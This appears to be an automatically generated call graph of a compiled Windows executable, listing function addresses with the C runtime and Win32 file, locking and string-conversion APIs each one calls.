85019->85028 85020 4026a7 85021 401b10 52 API calls 85020->85021 85027 4026db 85020->85027 85023 4026d1 85021->85023 85022 401b10 52 API calls 85022->85028 85093 40d7c0 52 API calls 2 library calls 85023->85093 85024 401c90 52 API calls 85024->85028 85027->84832 85028->85019 85028->85020 85028->85022 85028->85024 85092 40d7c0 52 API calls 2 library calls 85028->85092 85094 40f760 85029->85094 85032 410118 85032->84834 85034 42805d 85035 42806a 85034->85035 85150 431e58 85034->85150 85037 413748 _free 46 API calls 85035->85037 85038 428078 85037->85038 85039 431e58 82 API calls 85038->85039 85040 428084 85039->85040 85040->84834 85042 4115d7 52 API calls 85041->85042 85043 401f74 85042->85043 85043->84837 85045 4019a3 85044->85045 85050 401985 85044->85050 85046 4019b8 85045->85046 85045->85050 85753 403e10 53 API calls 85046->85753 85048 40199f 85048->84840 85049 4019c4 85049->84840 85050->85048 85752 403e10 53 API calls 85050->85752 85053 40c2c7 85052->85053 85054 40c30e 85052->85054 85055 40c2d3 85053->85055 85056 426c79 85053->85056 85057 40c315 85054->85057 85058 426c2b 85054->85058 85754 403ea0 52 API calls __cinit 85055->85754 85759 4534e3 52 API calls 85056->85759 85062 40c321 85057->85062 85063 426c5a 85057->85063 85060 426c4b 85058->85060 85061 426c2e 85058->85061 85757 4534e3 52 API calls 85060->85757 85069 40c2de 85061->85069 85756 4534e3 52 API calls 85061->85756 85755 403ea0 52 API calls __cinit 85062->85755 85758 4534e3 52 API calls 85063->85758 85069->84850 85069->85069 85071 401a30 85070->85071 85072 401a17 85070->85072 85074 402160 52 API calls 85071->85074 85073 401a2d 85072->85073 85760 403c30 52 API calls _memmove 85072->85760 85073->84854 85076 401a3d 85074->85076 85076->84854 85078 411523 85077->85078 85079 4114ba 85077->85079 85763 4113a8 58 API calls 3 library calls 85078->85763 85084 40200c 85079->85084 85761 417f77 46 API calls __getptd_noexit 85079->85761 85082 4114c6 85762 417f25 10 API calls ___crtsetenv 85082->85762 85084->84857 85084->84858 85085->84886 85086->84888 85087->84893 85088->84893 85090 4026f0 52 API calls 85089->85090 85091 401c97 85090->85091 85091->85018 85092->85028 85093->85027 85154 40f6f0 85094->85154 85096 40f77b _strcat moneypunct 85162 40f850 85096->85162 85101 427c2a 85191 414d04 85101->85191 85103 40f7fc 85103->85101 85104 40f804 85103->85104 85178 414a46 85104->85178 85108 40f80e 85108->85032 85113 4528bd 85108->85113 85110 427c59 85197 414fe2 85110->85197 85112 427c79 85114 4150d1 _fseek 81 API calls 85113->85114 85115 452930 85114->85115 85694 452719 85115->85694 85118 452948 85118->85034 85119 414d04 __fread_nolock 61 API calls 85120 452966 85119->85120 85121 414d04 __fread_nolock 61 API calls 85120->85121 85122 452976 85121->85122 85123 414d04 __fread_nolock 61 API calls 85122->85123 85124 45298f 85123->85124 85125 414d04 __fread_nolock 61 API calls 85124->85125 85126 4529aa 85125->85126 85127 4150d1 _fseek 81 API calls 85126->85127 85128 4529c4 85127->85128 85129 4135bb _malloc 46 API calls 85128->85129 85130 4529cf 85129->85130 85131 4135bb _malloc 46 API calls 85130->85131 85132 4529db 85131->85132 85133 414d04 __fread_nolock 61 API calls 85132->85133 85134 4529ec 85133->85134 85135 44afef GetSystemTimeAsFileTime 85134->85135 85136 452a00 85135->85136 85137 452a36 85136->85137 85138 452a13 85136->85138 85139 452aa5 85137->85139 85140 452a3c 85137->85140 85141 413748 _free 46 API calls 85138->85141 85143 413748 _free 46 API calls 85139->85143 85700 44b1a9 85140->85700 85144 452a1c 85141->85144 85146 452aa3 85143->85146 85147 413748 _free 46 API calls 85144->85147 85145 452a9d 85148 413748 _free 46 API calls 85145->85148 85146->85034 85149 452a25 85147->85149 85148->85146 85149->85034 85151 431e64 85150->85151 85152 431e6a 85150->85152 85153 414a46 __fcloseall 82 API calls 85151->85153 85152->85035 85153->85152 85155 425de2 85154->85155 85157 40f6fc _wcslen 85154->85157 85155->85096 85156 40f710 WideCharToMultiByte 85158 40f756 85156->85158 85159 40f728 85156->85159 85157->85156 85158->85096 85160 4115d7 52 API calls 85159->85160 85161 40f735 WideCharToMultiByte 85160->85161 85161->85096 85164 40f85d __wctomb_s_l _strlen 85162->85164 85165 40f7ab 85164->85165 85210 414db8 85164->85210 85166 4149c2 85165->85166 85222 414904 85166->85222 85168 40f7e9 85168->85101 85169 40f5c0 85168->85169 85174 40f5cd _strcat __write_nolock _memmove 85169->85174 85170 414d04 __fread_nolock 61 API calls 85170->85174 85172 425d11 85173 4150d1 _fseek 81 API calls 85172->85173 85175 425d33 85173->85175 85174->85170 85174->85172 85177 40f691 __tzset_nolock 85174->85177 85310 4150d1 85174->85310 85176 414d04 __fread_nolock 61 API calls 85175->85176 85176->85177 85177->85103 85179 414a52 __read 85178->85179 85180 414a64 85179->85180 85181 414a79 85179->85181 85450 417f77 46 API calls __getptd_noexit 85180->85450 85184 415471 __lock_file 47 API calls 85181->85184 85186 414a74 __read 85181->85186 85183 414a69 85451 417f25 10 API calls ___crtsetenv 85183->85451 85187 414a92 85184->85187 85186->85108 85434 4149d9 85187->85434 85519 414c76 85191->85519 85193 414d1c 85194 44afef 85193->85194 85687 442c5a 85194->85687 85196 44b00d 85196->85110 85198 414fee __read 85197->85198 85199 414ffa 85198->85199 85200 41500f 85198->85200 85691 417f77 46 API calls __getptd_noexit 85199->85691 85202 415471 __lock_file 47 API calls 85200->85202 85204 415017 85202->85204 85203 414fff 85692 417f25 10 API calls ___crtsetenv 85203->85692 85206 414e4e __ftell_nolock 51 API calls 85204->85206 85207 415024 85206->85207 85693 41503d LeaveCriticalSection LeaveCriticalSection _fprintf 85207->85693 85209 41500a __read 85209->85112 85211 414dd6 85210->85211 85212 414deb 85210->85212 85219 417f77 46 API calls __getptd_noexit 85211->85219 85212->85211 85216 414df2 85212->85216 85214 414ddb 85220 417f25 10 API calls ___crtsetenv 85214->85220 85217 414de6 85216->85217 85221 418f98 77 API calls 7 library calls 85216->85221 85217->85164 85219->85214 85220->85217 85221->85217 85225 414910 __read 85222->85225 85223 414923 85278 417f77 46 API calls __getptd_noexit 85223->85278 85225->85223 85227 414951 85225->85227 85226 414928 85279 417f25 10 API calls ___crtsetenv 85226->85279 85241 41d4d1 85227->85241 85230 414956 85231 41496a 85230->85231 85232 41495d 85230->85232 85234 414992 85231->85234 85235 414972 85231->85235 85280 417f77 46 API calls __getptd_noexit 85232->85280 85258 41d218 85234->85258 85281 417f77 46 API calls __getptd_noexit 85235->85281 85236 414933 @_EH4_CallFilterFunc@8 __read 85236->85168 85242 41d4dd __read 85241->85242 85243 4182cb __lock 46 API calls 85242->85243 85244 41d4eb 85243->85244 85245 41d567 85244->85245 85251 418209 __mtinitlocknum 46 API calls 85244->85251 85256 41d560 85244->85256 85286 4154b2 47 API calls __lock 85244->85286 85287 415520 LeaveCriticalSection LeaveCriticalSection _doexit 85244->85287 85247 416b04 __malloc_crt 46 API calls 85245->85247 85249 41d56e 85247->85249 85248 41d5f0 __read 85248->85230 85250 41d57c InitializeCriticalSectionAndSpinCount 85249->85250 85249->85256 85253 41d59c 85250->85253 85254 41d5af EnterCriticalSection 85250->85254 85251->85244 85255 413748 _free 46 API calls 85253->85255 85254->85256 85255->85256 85283 41d5fb 85256->85283 85259 41d23a 85258->85259 85260 41d255 85259->85260 85272 41d26c __wopenfile 85259->85272 85292 417f77 46 API calls __getptd_noexit 85260->85292 85261 41d421 85264 41d47a 85261->85264 85265 41d48c 85261->85265 85263 41d25a 85293 417f25 10 API calls ___crtsetenv 85263->85293 85297 417f77 46 API calls __getptd_noexit 85264->85297 85289 422bf9 85265->85289 85269 41d47f 85298 417f25 10 API calls ___crtsetenv 85269->85298 85270 41499d 85282 4149b8 LeaveCriticalSection LeaveCriticalSection _fprintf 85270->85282 85272->85261 85272->85264 85294 41341f 58 API calls 2 library calls 85272->85294 85274 41d41a 85274->85261 85295 41341f 58 API calls 2 library calls 85274->85295 85276 41d439 85276->85261 85296 41341f 58 API calls 2 library calls 85276->85296 85278->85226 85279->85236 85280->85236 85281->85236 85282->85236 85288 4181f2 LeaveCriticalSection 85283->85288 85285 41d602 85285->85248 85286->85244 85287->85244 85288->85285 85299 422b35 85289->85299 85291 422c14 85291->85270 85292->85263 85293->85270 85294->85274 85295->85276 85296->85261 85297->85269 85298->85270 85302 422b41 __read 85299->85302 85300 422b54 85301 417f77 ___crtsetenv 46 API calls 85300->85301 85303 422b59 85301->85303 85302->85300 85304 422b8a 85302->85304 85305 417f25 ___crtsetenv 10 API calls 85303->85305 85306 422400 __tsopen_nolock 109 API calls 85304->85306 85309 422b63 __read 85305->85309 85307 422ba4 85306->85307 85308 422bcb __wsopen_helper LeaveCriticalSection 85307->85308 85308->85309 85309->85291 85313 4150dd __read 85310->85313 85311 4150e9 85341 417f77 46 API calls __getptd_noexit 85311->85341 85313->85311 85314 41510f 85313->85314 85323 415471 85314->85323 85315 4150ee 85342 417f25 10 API calls ___crtsetenv 85315->85342 85322 4150f9 __read 85322->85174 85324 415483 85323->85324 85325 4154a5 EnterCriticalSection 85323->85325 85324->85325 85326 41548b 85324->85326 85328 415117 85325->85328 85327 4182cb __lock 46 API calls 85326->85327 85327->85328 85329 415047 85328->85329 85330 415067 85329->85330 85331 415057 85329->85331 85336 415079 85330->85336 85344 414e4e 85330->85344 85399 417f77 46 API calls __getptd_noexit 85331->85399 85335 41505c 85343 415143 LeaveCriticalSection LeaveCriticalSection _fprintf 85335->85343 85361 41443c 85336->85361 85339 4150b9 85374 41e1f4 85339->85374 85341->85315 85342->85322 85343->85322 85345 414e61 85344->85345 85346 414e79 85344->85346 85400 417f77 46 API calls __getptd_noexit 85345->85400 85348 414139 __ftell_nolock 46 API calls 85346->85348 85350 414e80 85348->85350 85349 414e66 85401 417f25 10 API calls ___crtsetenv 85349->85401 85352 41e1f4 __write 51 API calls 85350->85352 85353 414e97 85352->85353 85354 414f09 85353->85354 85356 414ec9 85353->85356 85360 414e71 85353->85360 85402 417f77 46 API calls __getptd_noexit 85354->85402 85357 41e1f4 __write 51 API calls 85356->85357 85356->85360 85358 414f64 85357->85358 85359 41e1f4 __write 51 API calls 85358->85359 85358->85360 85359->85360 85360->85336 85362 414455 85361->85362 85366 414477 85361->85366 85363 414139 __ftell_nolock 46 API calls 85362->85363 85362->85366 85364 414470 85363->85364 85403 41b7b2 77 API calls 5 library calls 85364->85403 85367 414139 85366->85367 85368 414145 85367->85368 85369 41415a 85367->85369 85404 417f77 46 API calls __getptd_noexit 85368->85404 85369->85339 85371 41414a 85405 417f25 10 API calls ___crtsetenv 85371->85405 85373 414155 85373->85339 85375 41e200 __read 85374->85375 85376 41e223 85375->85376 85377 41e208 85375->85377 85378 41e22f 85376->85378 85383 41e269 85376->85383 85426 417f8a 46 API calls __getptd_noexit 85377->85426 85428 417f8a 46 API calls __getptd_noexit 85378->85428 85381 41e20d 85427 417f77 46 API calls __getptd_noexit 85381->85427 85382 41e234 85429 417f77 46 API calls __getptd_noexit 85382->85429 85406 41ae56 85383->85406 85387 41e215 __read 85387->85335 85388 41e23c 85430 417f25 10 API calls ___crtsetenv 85388->85430 85389 41e26f 85391 41e291 85389->85391 85392 41e27d 85389->85392 85431 417f77 46 API calls __getptd_noexit 85391->85431 85416 41e17f 85392->85416 85395 41e296 85432 417f8a 46 API calls __getptd_noexit 85395->85432 85396 41e289 85433 41e2c0 LeaveCriticalSection __unlock_fhandle 85396->85433 85399->85335 85400->85349 85401->85360 85402->85360 85403->85366 85404->85371 85405->85373 85407 41ae62 __read 85406->85407 85408 41aebc 85407->85408 85411 4182cb __lock 46 API calls 85407->85411 85409 41aec1 EnterCriticalSection 85408->85409 85410 41aede __read 85408->85410 85409->85410 85410->85389 85412 41ae8e 85411->85412 85413 41aeaa 85412->85413 85414 41ae97 InitializeCriticalSectionAndSpinCount 85412->85414 85415 41aeec ___lock_fhandle LeaveCriticalSection 85413->85415 85414->85413 85415->85408 85417 41aded __lseeki64_nolock 46 API calls 85416->85417 85418 41e18e 85417->85418 85419 41e1a4 SetFilePointer 85418->85419 85420 41e194 85418->85420 85422 41e1bb GetLastError 85419->85422 85423 41e1c3 85419->85423 85421 417f77 ___crtsetenv 46 API calls 85420->85421 85424 41e199 85421->85424 85422->85423 85423->85424 85425 417f9d __dosmaperr 46 API calls 85423->85425 85424->85396 85425->85424 85426->85381 85427->85387 85428->85382 85429->85388 85430->85387 85431->85395 85432->85396 85433->85387 85435 4149ea 85434->85435 85436 4149fe 85434->85436 85480 417f77 46 API calls __getptd_noexit 85435->85480 85438 4149fa 85436->85438 85440 41443c __flush 77 API calls 85436->85440 85452 414ab2 LeaveCriticalSection LeaveCriticalSection _fprintf 85438->85452 85439 4149ef 85481 417f25 10 API calls ___crtsetenv 85439->85481 85442 414a0a 85440->85442 85453 41d8c2 85442->85453 85445 414139 __ftell_nolock 46 API calls 85446 414a18 85445->85446 85457 41d7fe 85446->85457 85448 414a1e 85448->85438 85449 413748 _free 46 API calls 85448->85449 85449->85438 85450->85183 85451->85186 85452->85186 85454 414a12 85453->85454 85455 41d8d2 85453->85455 85454->85445 85455->85454 85456 413748 _free 46 API calls 85455->85456 85456->85454 85458 41d80a __read 85457->85458 85459 41d812 85458->85459 85460 41d82d 85458->85460 85497 417f8a 46 API calls __getptd_noexit 85459->85497 85461 41d839 85460->85461 85466 41d873 85460->85466 85499 417f8a 46 API calls __getptd_noexit 85461->85499 85464 41d817 85498 417f77 46 API calls __getptd_noexit 85464->85498 85465 41d83e 85500 417f77 46 API calls __getptd_noexit 85465->85500 85469 41ae56 ___lock_fhandle 48 API calls 85466->85469 85471 41d879 85469->85471 85470 41d846 85501 417f25 10 API calls ___crtsetenv 85470->85501 85473 41d893 85471->85473 85474 41d887 85471->85474 85502 417f77 46 API calls __getptd_noexit 85473->85502 85482 41d762 85474->85482 85477 41d81f __read 85477->85448 85478 41d88d 85503 41d8ba LeaveCriticalSection __unlock_fhandle 85478->85503 85480->85439 85481->85438 85504 41aded 85482->85504 85484 41d7c8 85517 41ad67 47 API calls 2 library calls 85484->85517 85486 41d772 85486->85484 85488 41aded __lseeki64_nolock 46 API calls 85486->85488 85496 41d7a6 85486->85496 85487 41aded __lseeki64_nolock 46 API calls 85490 41d7b2 CloseHandle 85487->85490 85489 41d79d 85488->85489 85492 41aded __lseeki64_nolock 46 API calls 85489->85492 85490->85484 85493 41d7be GetLastError 85490->85493 85491 41d7d0 85495 41d7f2 85491->85495 85518 417f9d 46 API calls 3 library calls 85491->85518 85492->85496 85493->85484 85495->85478 85496->85484 85496->85487 85497->85464 85498->85477 85499->85465 85500->85470 85501->85477 85502->85478 85503->85477 85505 41ae12 85504->85505 85506 41adfa 85504->85506 85509 417f8a __read 46 API calls 85505->85509 85512 41ae51 85505->85512 85507 417f8a __read 46 API calls 85506->85507 85508 41adff 85507->85508 85510 417f77 ___crtsetenv 46 API calls 85508->85510 85511 41ae23 85509->85511 85514 41ae07 85510->85514 85513 417f77 ___crtsetenv 46 API calls 85511->85513 85512->85486 85515 41ae2b 85513->85515 85514->85486 85516 417f25 ___crtsetenv 10 API calls 85515->85516 85516->85514 85517->85491 85518->85495 85520 414c82 __read 85519->85520 85521 414cc3 85520->85521 85522 414c96 __wctomb_s_l 85520->85522 85523 414cbb __read 85520->85523 85524 415471 __lock_file 47 API calls 85521->85524 85546 417f77 46 API calls __getptd_noexit 85522->85546 85523->85193 85525 414ccb 85524->85525 85532 414aba 85525->85532 85528 414cb0 85547 417f25 10 API calls ___crtsetenv 85528->85547 85535 414ad8 __wctomb_s_l 85532->85535 85537 414af2 85532->85537 85533 414ae2 85599 417f77 46 API calls __getptd_noexit 85533->85599 85535->85533 85535->85537 85542 414b2d 85535->85542 85548 414cfa LeaveCriticalSection LeaveCriticalSection _fprintf 85537->85548 85539 414c38 __wctomb_s_l 85602 417f77 46 API calls __getptd_noexit 85539->85602 85540 414139 __ftell_nolock 46 API calls 85540->85542 85542->85537 85542->85539 85542->85540 85549 41dfcc 85542->85549 85579 41d8f3 85542->85579 85601 41e0c2 46 API calls 3 library calls 85542->85601 85545 414ae7 85600 417f25 10 API calls ___crtsetenv 85545->85600 85546->85528 85547->85523 85548->85523 85550 41dfd8 __read 85549->85550 85551 41dfe0 85550->85551 85552 41dffb 85550->85552 85672 417f8a 46 API calls __getptd_noexit 85551->85672 85554 41e007 85552->85554 85557 41e041 85552->85557 85674 417f8a 46 API calls __getptd_noexit 85554->85674 85555 41dfe5 85673 417f77 46 API calls __getptd_noexit 85555->85673 85560 41e063 85557->85560 85561 41e04e 85557->85561 85559 41e00c 85675 417f77 46 API calls __getptd_noexit 85559->85675 85565 41ae56 ___lock_fhandle 48 API calls 85560->85565 85677 417f8a 46 API calls __getptd_noexit 85561->85677 85563 41e014 85676 417f25 10 API calls ___crtsetenv 85563->85676 85567 41e069 85565->85567 85566 41e053 85678 417f77 46 API calls __getptd_noexit 85566->85678 85571 41e077 85567->85571 85572 41e08b 85567->85572 85570 41dfed __read 85570->85542 85603 41da15 85571->85603 85679 417f77 46 API calls __getptd_noexit 85572->85679 85575 41e083 85681 41e0ba LeaveCriticalSection __unlock_fhandle 85575->85681 85576 41e090 85680 417f8a 46 API calls __getptd_noexit 85576->85680 85580 41d900 85579->85580 85584 41d915 85579->85584 85685 417f77 46 API calls __getptd_noexit 85580->85685 85582 41d905 85686 417f25 10 API calls ___crtsetenv 85582->85686 85585 41d94a 85584->85585 85592 41d910 85584->85592 85682 420603 85584->85682 85587 414139 __ftell_nolock 46 API calls 85585->85587 85588 41d95e 85587->85588 85589 41dfcc __read 59 API calls 85588->85589 85590 41d965 85589->85590 85591 414139 __ftell_nolock 46 API calls 85590->85591 85590->85592 85593 41d988 85591->85593 85592->85542 85593->85592 85594 414139 __ftell_nolock 46 API calls 85593->85594 85595 41d994 85594->85595 85595->85592 85596 414139 __ftell_nolock 46 API calls 85595->85596 85597 41d9a1 85596->85597 85598 414139 __ftell_nolock 46 API calls 85597->85598 85598->85592 85599->85545 85600->85537 85601->85542 85602->85545 85604 41da31 85603->85604 85605 41da4c 85603->85605 85606 417f8a __read 46 API calls 85604->85606 85607 41da5b 85605->85607 85609 41da7a 85605->85609 85608 41da36 85606->85608 85610 417f8a __read 46 API calls 85607->85610 85611 417f77 ___crtsetenv 46 API calls 85608->85611 85613 41da98 85609->85613 85625 41daac 85609->85625 85612 41da60 85610->85612 85626 41da3e 85611->85626 85616 417f77 ___crtsetenv 46 API calls 85612->85616 85614 417f8a __read 46 API calls 85613->85614 85617 41da9d 85614->85617 85615 41db02 85619 417f8a __read 46 API calls 85615->85619 85618 41da67 85616->85618 85621 417f77 ___crtsetenv 46 API calls 85617->85621 85622 417f25 ___crtsetenv 10 API calls 85618->85622 85620 41db07 85619->85620 85623 417f77 ___crtsetenv 46 API calls 85620->85623 85624 41daa4 85621->85624 85622->85626 85623->85624 85628 417f25 ___crtsetenv 10 API calls 85624->85628 85625->85615 85625->85626 85627 41dae1 85625->85627 85629 41db1b 85625->85629 85626->85575 85627->85615 85632 41daec ReadFile 85627->85632 85628->85626 85631 416b04 __malloc_crt 46 API calls 85629->85631 85633 41db31 85631->85633 85634 41dc17 85632->85634 85635 41df8f GetLastError 85632->85635 85638 41db59 85633->85638 85639 41db3b 85633->85639 85634->85635 85640 41dc2b 85634->85640 85636 41de16 85635->85636 85637 41df9c 85635->85637 85647 417f9d __dosmaperr 46 API calls 85636->85647 85653 41dd9b 85636->85653 85642 417f77 ___crtsetenv 46 API calls 85637->85642 85641 420494 __lseeki64_nolock 48 API calls 85638->85641 85643 417f77 ___crtsetenv 46 API calls 85639->85643 85651 41dc47 85640->85651 85652 41de5b 85640->85652 85640->85653 85644 41db67 85641->85644 85645 41dfa1 85642->85645 85646 41db40 85643->85646 85644->85632 85648 417f8a __read 46 API calls 85645->85648 85649 417f8a __read 46 API calls 85646->85649 85647->85653 85648->85653 85649->85626 85650 413748 _free 46 API calls 85650->85626 85655 41dd28 85651->85655 85656 41dcab ReadFile 85651->85656 85652->85653 85654 41ded0 ReadFile 85652->85654 85653->85626 85653->85650 85658 41deef GetLastError 85654->85658 85664 41def9 85654->85664 85655->85653 85661 41dda3 85655->85661 85662 41dd96 85655->85662 85669 41dd60 85655->85669 85657 41dcc9 GetLastError 85656->85657 85663 41dcd3 85656->85663 85657->85651 85657->85663 85658->85652 85658->85664 85659 41ddec MultiByteToWideChar 85659->85653 85660 41de10 GetLastError 85659->85660 85660->85636 85666 41ddda 85661->85666 85661->85669 85665 417f77 ___crtsetenv 46 API calls 85662->85665 85663->85651 85667 420494 __lseeki64_nolock 48 API calls 85663->85667 85664->85652 85668 420494 __lseeki64_nolock 48 API calls 85664->85668 85665->85653 85670 420494 __lseeki64_nolock 48 API calls 85666->85670 85667->85663 85668->85664 85669->85659 85671 41dde9 85670->85671 85671->85659 85672->85555 85673->85570 85674->85559 85675->85563 85676->85570 85677->85566 85678->85563 85679->85576 85680->85575 85681->85570 85683 416b04 __malloc_crt 46 API calls 85682->85683 85684 420618 85683->85684 85684->85585 85685->85582 85686->85592 85690 4148b3 GetSystemTimeAsFileTime __aulldiv 85687->85690 85689 442c6b 85689->85196 85690->85689 85691->85203 85692->85209 85693->85209 85699 45272f __tzset_nolock _wcscpy 85694->85699 85695 414d04 61 API calls __fread_nolock 85695->85699 85696 44afef GetSystemTimeAsFileTime 85696->85699 85697 4528a4 85697->85118 85697->85119 85698 4150d1 81 API calls _fseek 85698->85699 85699->85695 85699->85696 85699->85697 85699->85698 85701 44b1bc 85700->85701 85702 44b1ca 85700->85702 85703 4149c2 116 API calls 85701->85703 85704 44b1e1 85702->85704 85705 44b1d8 85702->85705 85706 4149c2 116 API calls 85702->85706 85703->85702 85735 4321a4 85704->85735 85705->85145 85708 44b2db 85706->85708 85708->85704 85710 44b2e9 85708->85710 85709 44b224 85711 44b253 85709->85711 85712 44b228 85709->85712 85713 44b2f6 85710->85713 85715 414a46 __fcloseall 82 API calls 85710->85715 85739 43213d 85711->85739 85714 44b235 85712->85714 85718 414a46 __fcloseall 82 API calls 85712->85718 85713->85145 85719 44b245 85714->85719 85722 414a46 __fcloseall 82 API calls 85714->85722 85715->85713 85717 44b25a 85720 44b260 85717->85720 85721 44b289 85717->85721 85718->85714 85719->85145 85724 414a46 __fcloseall 82 API calls 85720->85724 85726 44b26d 85720->85726 85749 44b0bf 87 API calls 85721->85749 85722->85719 85724->85726 85725 44b28f 85750 4320f8 46 API calls _free 85725->85750 85727 414a46 __fcloseall 82 API calls 85726->85727 85729 44b27d 85726->85729 85727->85729 85729->85145 85730 44b295 85731 44b2a2 85730->85731 85732 414a46 __fcloseall 82 API calls 85730->85732 85733 44b2b2 85731->85733 85734 414a46 __fcloseall 82 API calls 85731->85734 85732->85731 85733->85145 85734->85733 85736 4321cb 85735->85736 85738 4321b4 __tzset_nolock _memmove 85735->85738 85737 414d04 __fread_nolock 61 API calls 85736->85737 85737->85738 85738->85709 85740 4135bb _malloc 46 API calls 85739->85740 85741 432150 85740->85741 85742 4135bb _malloc 46 API calls 85741->85742 85743 432162 85742->85743 85744 4135bb _malloc 46 API calls 85743->85744 85745 432174 85744->85745 85747 432189 85745->85747 85751 4320f8 46 API calls _free 85745->85751 85747->85717 85748 432198 85748->85717 85749->85725 85750->85730 85751->85748 85752->85048 85753->85049 85754->85069 85755->85069 85756->85069 85757->85063 85758->85069 85759->85069 85760->85073 85761->85082 85762->85084 85763->85084 85813 410160 85764->85813 85766 41012f GetFullPathNameW 85767 410147 moneypunct 85766->85767 85767->84902 85769 4102cb SHGetDesktopFolder 85768->85769 85772 410333 _wcsncpy 85768->85772 85770 4102e0 _wcsncpy 85769->85770 85769->85772 85771 41031c SHGetPathFromIDListW 85770->85771 85770->85772 85771->85772 85772->84906 85774 4101bb 85773->85774 85778 425f4a 85773->85778 85775 410160 52 API calls 85774->85775 85777 4101c7 85775->85777 85776 4114ab __wcsicoll 58 API calls 85776->85778 85817 410200 52 API calls 2 library calls 85777->85817 85778->85776 85781 425f6e 85778->85781 85780 4101d6 85818 410200 52 API calls 2 library calls 85780->85818 85781->84908 85783 4101e9 85783->84908 85785 40f760 126 API calls 85784->85785 85786 40f584 85785->85786 85787 429335 85786->85787 85788 40f58c 85786->85788 85791 4528bd 118 API calls 85787->85791 85789 40f598 85788->85789 85790 429358 85788->85790 85843 4033c0 113 API calls 7 library calls 85789->85843 85844 434034 86 API calls _wprintf 85790->85844 85793 42934b 85791->85793 85796 429373 85793->85796 85797 42934f 85793->85797 85795 40f5b4 85795->84904 85799 4115d7 52 API calls 85796->85799 85800 431e58 82 API calls 85797->85800 85798 429369 85798->85796 85803 4293c5 moneypunct 85799->85803 85800->85790 85801 42959c 85802 413748 _free 46 API calls 85801->85802 85804 4295a5 85802->85804 85803->85801 85810 401b10 52 API calls 85803->85810 85819 444af8 85803->85819 85822 44b41c 85803->85822 85829 402780 85803->85829 85837 4022d0 85803->85837 85845 44c7dd 64 API calls 3 library calls 85803->85845 85805 431e58 82 API calls 85804->85805 85806 4295b1 85805->85806 85810->85803 85814 410167 _wcslen 85813->85814 85815 4115d7 52 API calls 85814->85815 85816 41017e _wcscpy 85815->85816 85816->85766 85817->85780 85818->85783 85820 4115d7 52 API calls 85819->85820 85821 444b27 _memmove 85820->85821 85821->85803 85824 44b429 85822->85824 85823 4115d7 52 API calls 85825 44b440 85823->85825 85824->85823 85826 44b45e 85825->85826 85827 401b10 52 API calls 85825->85827 85826->85803 85828 44b453 85827->85828 85828->85803 85830 402790 moneypunct _memmove 85829->85830 85831 402827 85829->85831 85832 4115d7 52 API calls 85830->85832 85833 4115d7 52 API calls 85831->85833 85834 402797 85832->85834 85833->85830 85835 4115d7 52 API calls 85834->85835 85836 4027bd 85834->85836 85835->85836 85836->85803 85838 4022e0 85837->85838 85840 40239d 85837->85840 85839 4115d7 52 API calls 85838->85839 85838->85840 85841 402320 moneypunct 85838->85841 85839->85841 85840->85803 85841->85840 85842 4115d7 52 API calls 85841->85842 85842->85841 85843->85795 85844->85798 85845->85803 85847 402539 moneypunct 85846->85847 85848 402417 85846->85848 85847->84912 85848->85847 85849 4115d7 52 API calls 85848->85849 85850 402443 85849->85850 85851 4115d7 52 API calls 85850->85851 85852 4024b4 85851->85852 85852->85847 85854 4022d0 52 API calls 85852->85854 85875 402880 85852->85875 85854->85852 85859 401566 85855->85859 85856 401794 85927 40e9a0 90 API calls 85856->85927 85859->85856 85860 4010a0 52 API calls 85859->85860 85861 40167a 85859->85861 85860->85859 85862 4017c0 85861->85862 85928 45e737 90 API calls 3 library calls 85861->85928 85862->84914 85864 40bc70 52 API calls 85863->85864 85873 40d451 85864->85873 85865 40d50f 85931 410600 52 API calls 85865->85931 85867 427c01 85932 45e737 90 API calls 3 library calls 85867->85932 85868 40e0a0 52 API calls 85868->85873 85870 401b10 52 API calls 85870->85873 85871 40d519 85871->84917 85873->85865 85873->85867 85873->85868 85873->85870 85873->85871 85929 40f310 53 API calls 85873->85929 85930 40d860 91 API calls 85873->85930 85876 4115d7 52 API calls 85875->85876 85877 4028b3 85876->85877 85878 4115d7 52 API calls 85877->85878 85916 4028c5 moneypunct _memmove 85878->85916 85879 402780 52 API calls 85914 402b1e moneypunct 85879->85914 85880 427d62 85883 403350 52 API calls 85880->85883 85882 402aeb moneypunct 85882->85879 85890 42802b moneypunct 85882->85890 85892 427d6b 85883->85892 85884 402bb6 85918 403060 53 API calls 85884->85918 85886 402bca 85887 427f63 85886->85887 85888 402bd4 85886->85888 85924 460879 92 API calls 3 library calls 85887->85924 85891 402780 52 API calls 85888->85891 85889 403350 52 API calls 85889->85916 85894 402bdf 85891->85894 85898 427f2c 85892->85898 85921 403020 52 API calls _memmove 85892->85921 85894->85852 85897 427fd5 85925 460879 92 API calls 3 library calls 85897->85925 85923 460879 92 API calls 3 library calls 85898->85923 85899 402780 52 API calls 85899->85916 85902 427fa5 85910 402780 52 API calls 85902->85910 85903 402f00 52 API calls 85903->85916 85905 427fe4 85909 402780 52 API calls 85905->85909 85906 428000 85926 460879 92 API calls 3 library calls 85906->85926 85908 4026f0 52 API calls 85913 402a85 CharUpperBuffW 85908->85913 85912 427f48 85909->85912 85910->85914 85912->85914 85913->85916 85914->85852 85915 4115d7 52 API calls 85915->85916 85916->85880 85916->85882 85916->85884 85916->85889 85916->85897 85916->85898 85916->85899 85916->85902 85916->85903 85916->85906 85916->85908 85916->85915 85917 4031b0 63 API calls 85916->85917 85919 402f80 92 API calls _memmove 85916->85919 85920 402280 52 API calls 85916->85920 85922 4013a0 52 API calls 85916->85922 85917->85916 85918->85886 85919->85916 85920->85916 85921->85892 85922->85916 85923->85912 85924->85912 85925->85905 85926->85914 85927->85861 85928->85862 85929->85873 85930->85873 85931->85871 85932->85871 85933->84930 85934->84931 85936 4091c6 85935->85936 85937 42c5fe 85935->85937 85936->84990 85937->85936 85938 40bc70 52 API calls 85937->85938 85939 42c64e InterlockedIncrement 85938->85939 85940 42c665 85939->85940 85946 42c697 85939->85946 85942 42c672 InterlockedDecrement Sleep InterlockedIncrement 85940->85942 85940->85946 85941 42c737 InterlockedDecrement 85943 42c74a 85941->85943 85942->85940 85942->85946 85945 408f40 VariantClear 85943->85945 85944 42c731 85944->85941 85947 42c752 85945->85947 85946->85941 85946->85944 86093 408e80 85946->86093 86106 410c60 VariantClear moneypunct 85947->86106 85952 42c6db 85953 402160 52 API calls 85952->85953 85954 42c6e5 85953->85954 85955 45340c 85 API calls 85954->85955 85956 42c6f1 85955->85956 86103 40d200 52 API calls 2 library calls 85956->86103 85958 42c6fb 86104 465124 53 API calls 85958->86104 85960 42c715 85961 42c76a 85960->85961 85962 42c719 85960->85962 85963 401b10 52 API calls 85961->85963 86105 46fe32 VariantClear 